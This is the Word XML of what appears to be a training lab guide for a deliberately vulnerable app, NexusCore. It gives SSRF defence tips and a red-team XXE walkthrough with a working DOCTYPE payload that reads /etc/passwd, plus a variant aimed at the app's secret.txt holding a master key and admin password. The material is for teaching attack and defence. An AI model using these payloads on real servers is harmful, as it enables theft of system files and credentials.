              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Re-resolve hostnames after DNS lookup — "DNS rebinding" attacks can bypass hostname checks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Set strict timeouts and disable redirects to prevent redirect-based SSRF.</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A6F1E" w:sz="1"/>
              <w:left w:val="single" w:color="CA6F1E" w:sz="14"/>
              <w:bottom w:val="single" w:color="CA6F1E" w:sz="1"/>
              <w:right w:val="single" w:color="CA6F1E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="CA6F1E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  Real-World Impact</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SSRF was used in the 2019 Capital One breach (100M records). Cloud environments are most at risk: AWS metadata service at 169.254.169.254 exposes IAM tokens. Can escalate to full cloud account takeover.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C8D6E5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="40" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pP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0"/>
        <w:gridCol w:w="8620"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="740"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">V2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8620"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">XML External Entity Injection (XXE)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">[ Advanced ]</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276" w:sz="1"/>
              <w:left w:val="single" w:color="1A5276" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A5276" w:sz="1"/>
              <w:right w:val="single" w:color="1A5276" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📖  What Is This Vulnerability?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">XXE allows attackers to include external file content in XML via DOCTYPE entity declarations. The Report Upload endpoint parses XML without disabling external entity processing, so SYSTEM entities resolve actual files on the server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴  RED TEAM — ATTACK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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Understand the XML report upload feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Navigate to Reports → XML Report Processor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Normal use: upload an XML-format scan report. Server parses and returns structured data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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The parser does not disable DOCTYPE processing — we can declare external entities!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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Craft a basic XXE payload to read /etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Click "XXE→/etc/passwd" quick-fill or write the payload manually:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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The DOCTYPE declares an external entity pointing to a file on the server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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When the XML is parsed, the entity resolves to the file contents.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;!DOCTYPE foo [
  &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;
]&gt;
&lt;report&gt;
  &lt;title&gt;XXE Test Report&lt;/title&gt;
  &lt;content&gt;&amp;xxe;&lt;/content&gt;
&lt;/report&gt;</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Submit and inspect the response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Click Process → look at the "external_entities" field in the response.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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The /etc/passwd file content is returned — all system usernames visible!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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This confirms XXE is working — now escalate to more sensitive files.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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Read application secrets — secret.txt and config files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Change the SYSTEM path to the application secret file:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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SYSTEM "file:///absolute/path/to/nexuscore/secret.txt"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Response contains: NEXUSCORE_MASTER_KEY, ADMIN_PASS, and FLAG.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
